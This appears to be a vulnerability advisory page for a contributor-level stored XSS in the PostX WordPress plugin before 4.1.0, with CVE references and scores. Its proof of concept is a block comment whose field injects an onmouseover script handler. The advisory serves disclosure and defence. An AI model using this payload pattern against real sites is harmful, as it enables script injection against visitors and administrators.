Lucene search
Dmitrii IgnatyevWPEX-ID:635BE98D-4C17-4E75-871F-9794D85A2EB1HistoryMay 27, 2024 - 12:00 a.m.
PostX < 4.1.0 - Contributor+ Stored XSS
2024-05-2700:00:00
Dmitrii Ignatyev
14
postx contributor+ stored xss
poc
june 10 2024
exploit
Description The plugin does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
As a contributor, put the below code in a post while in Code Editor mode
<!-- wp:ultimate-post/post-grid-3 {"blockId":"d57ca5","currentPostId":"2198","filterShow":true,"paginationShow":true,"readMore":true,"contentTag":"section","openInTab":true,"headingText":"123","headingURL":"123","headingTag":"h5","titleTag":"h6","metaMinText":"123","metaAuthorPrefix":"123","fallbackImg":{"url":"123","id":99999},"readMoreText":"123","filterText":"ClickMe!","filterMobileText":"\u0022onmouseover='alert(/XSS/)'","loadMoreText":"123"} /-->
The XSS will be triggered when (pre)viewing the post and moving the mouse over the ClickMe! textReferences
Related
wpvulndb
wpvulndb
nvd
nvd
CVE-2024-4305
2024-06-17 06:15:09
CVE-2024-5758
2024-06-08 07:15:08
cve
cve
CVE-2024-4305
2024-06-17 06:15:09
CVE-2024-5758
2024-06-08 07:15:08
cvelist
cvelist
CVE-2024-4305 PostX < 4.1.0 - Contributor+ Stored XSS
2024-06-17 06:00:01
wordfence
wordfence
8.3 High
AI Score
Confidence
High
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:635BE98D-4C17-4E75-871F-9794D85A2EB1